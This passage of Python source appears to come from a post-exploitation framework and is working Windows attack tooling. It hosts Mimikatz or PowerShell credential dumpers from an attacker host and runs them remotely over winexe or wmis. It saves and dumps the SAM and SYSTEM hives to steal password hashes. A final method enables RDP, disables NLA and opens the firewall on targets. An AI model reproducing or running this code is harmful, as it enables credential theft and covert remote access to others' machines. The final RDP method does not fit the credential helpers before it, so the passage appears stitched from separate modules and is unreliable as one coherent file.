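        found["wdigest"].extend(wdigest)
        found["tspkg"].extend(tspkg)

    def _grabWithPowershell(self, target, username, password, lhost, use_ssl,
                            delay, out_file, found):
        """Host autograb.ps1 from *lhost*, trigger it over winexe with its
        output in *out_file*, wait *delay* seconds, then fetch and delete the
        file, save it as autograb.txt and parse both the mimikatz and the
        powerdump sections into *found*."""
        print(helpers.color("\n [*] Powershell installed on " + target))
        self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

        # path to the combined Invoke-Mimikatz/powerdump powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

        delivery_methods.powershellHostTrigger(target,
                                               username,
                                               password,
                                               secondStagePath,
                                               lhost,
                                               "",
                                               triggerMethod="winexe",
                                               outFile=out_file,
                                               ssl=use_ssl,
                                               noArch=True)

        print("\n [*] Waiting " + delay + "s for Autograb to run...")
        time.sleep(int(delay))

        out = smb.getFile(target, username, password, out_file, delete=True)

        saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

        self._collectMimikatz(out, found)
        found["hashes"].extend(helpers.parseHashdump(out))

        if out != "":
            self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

    def _grabWithRegAndMimikatz(self, target, username, password, lhost,
                                delay, out_file, found):
        """Fallback without PowerShell: save the hives with reg.exe over wmis,
        dump hashes from them, then run the mimikatz binary."""
        print(helpers.color("\n [!] Powershell not installed on " + target, warning=True))
        print(helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target))
        self.output += "[!] Powershell not installed on " + target + "\n"

        # reg.exe command to save off the hives
        regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
        command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

        print(helpers.color("\n [*] Dumping hashes on " + target))

        # fixed wait for the saves to land before fetching them
        time.sleep(5)

        self._dumpHashesFromHives(target, username, password, found)
        self._mimikatzViaBinary(target, username, password, lhost, delay, out_file, found)

    def _dumpHashesFromHives(self, target, username, password, found):
        """Fetch the saved SYSTEM/SECURITY/SAM hives, run creddump on
        SYSTEM+SAM from a private temp directory, save the output as
        creddump.txt and add the parsed hashes to *found*.

        Hive material is written to a mkdtemp() directory (mode 0700) that is
        removed afterwards, instead of fixed world-readable /tmp/<name> files
        that persisted between runs.  The dump is skipped, with a message,
        when SYSTEM or SAM was not retrieved -- previously creddump ran on
        whatever stale or missing local files were there.
        """
        # function-scope imports: the module's import block is outside this snippet
        import shutil
        import tempfile

        # the remote copies are fetched with delete=False and this module
        # records no cleanup entry for them
        remoteHives = (("system", "C:\\Windows\\Temp\\system"),
                       ("security", "C:\\Windows\\Temp\\security"),
                       ("sam", "C:\\Windows\\Temp\\sam"))

        workDir = tempfile.mkdtemp(prefix="pillage-hives-")
        try:
            localHives = {}
            for name, remotePath in remoteHives:
                data = smb.getFile(target, username, password, remotePath, delete=False)
                if data == "":
                    # report the file name; the old message interpolated the (empty) contents
                    self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"
                    continue
                localPath = os.path.join(workDir, name)
                with open(localPath, "wb") as f:
                    f.write(data)
                localHives[name] = localPath

            # creddump.dump_file_hashes consumes only SYSTEM and SAM; SECURITY
            # is fetched as before but not used by the dump
            if "system" not in localHives or "sam" not in localHives:
                self.output += "[!] Skipping creddump on " + target + " : SYSTEM or SAM hive not retrieved\n"
                return

            out = creddump.dump_file_hashes(localHives["system"], localHives["sam"])
        finally:
            shutil.rmtree(workDir, ignore_errors=True)

        saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
        self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

        found["hashes"].extend(helpers.parseHashdump(out))

    def _mimikatzViaBinary(self, target, username, password, lhost, delay,
                           out_file, found):
        """Probe the architecture over wmis, host the matching mimikatz
        binary from *lhost* with its output redirected to *out_file*, wait
        *delay* seconds, then fetch/delete the file, parse it into *found*
        and save it as mimikatz.txt."""
        archCommand = "echo %PROCESSOR_ARCHITECTURE%"
        archResult = command_methods.executeResult(
            target, username, password, archCommand, "wmis")
        arch = "x64" if "64" in archResult else "x86"

        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
        exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

        # host and trigger ONLY on this machine so the architecture matches
        delivery_methods.hostTrigger(target,
                                     username,
                                     password,
                                     mimikatzPath,
                                     lhost,
                                     triggerMethod="wmis",
                                     exeArgs=exeArgs)

        print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
        time.sleep(int(delay))

        out = smb.getFile(target, username, password, out_file, delete=True)

        self._collectMimikatz(out, found)

        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

        if out != "":
            self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

    def _appendCredentialSummary(self, found):
        """Append de-duplicated, sorted totals for each non-empty bucket of
        *found* to ``self.output``, hashes first."""
        if found["hashes"]:
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(sorted(set(found["hashes"]))) + "\n"
        for name in ("msv1_0", "kerberos", "wdigest", "tspkg"):
            if found[name]:
                self.output += "[*] All " + name + ":\n\t" + "\n\t".join(sorted(set(found[name]))) + "\n"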
    def run(self):
        """Enable Remote Desktop on every target in three dependent steps:
        set fDenyTSConnections=0, set UserAuthentication=0 on the RDP-Tcp
        station (turns NLA off), then enable the remotedesktop firewall
        service exception with netsh.  A step runs only if the previous one
        reported success; every outcome is logged to ``self.output``.

        Only the first credential pair is used.  The cleanup entry recorded
        after the first step only re-sets fDenyTSConnections to 1; the NLA
        change and the firewall exception are not reverted by this module.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        tsKey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"
        rdpCMD = "reg add \"" + tsKey + "\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
        rdpCleanupCMD = "reg add \"" + tsKey + "\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"
        nlaCMD = "reg add \"" + tsKey + "\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f"
        firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"

        regOK = "The operation completed successfully"

        for target in self.targets:

            # every log line for this target ends the same way
            tail = " using creds '" + username + ":" + password + "' on : " + target + "\n"

            rdpResult = command_methods.executeResult(
                target, username, password, rdpCMD, triggerMethod)
            if rdpResult == "":
                self.output += "[!] No result file, RDP enable failed" + tail
                continue
            if regOK not in rdpResult:
                self.output += "[!] Error in enabling RDP" + tail
                continue

            self.output += "[*] RDP successfully enabled" + tail
            # cleanup -> execute the RDP disable command later
            self.cleanup += "|".join(["executeCommand", target, username, password,
                                      rdpCleanupCMD, triggerMethod]) + "\n"

            nlaResult = command_methods.executeResult(
                target, username, password, nlaCMD, triggerMethod)
            if nlaResult == "":
                self.output += "[!] No result file, NLA disable failed" + tail
                continue
            if regOK not in nlaResult:
                self.output += "[!] Error in disabling NLA" + tail
                continue

            self.output += "[*] NLA successfully disabled" + tail

            firewallResult = command_methods.executeResult(
                target, username, password, firewallCMD, triggerMethod)
            if firewallResult == "":
                # message text kept verbatim (including "exeception")
                self.output += "[!] No result file, firewall exeception failed" + tail
            elif "executed successfully" in firewallResult:
                self.output += "[*] Firewall exception successfully enabled" + tail
            else:
                self.output += "[!] Error in enabling firewall exception" + tail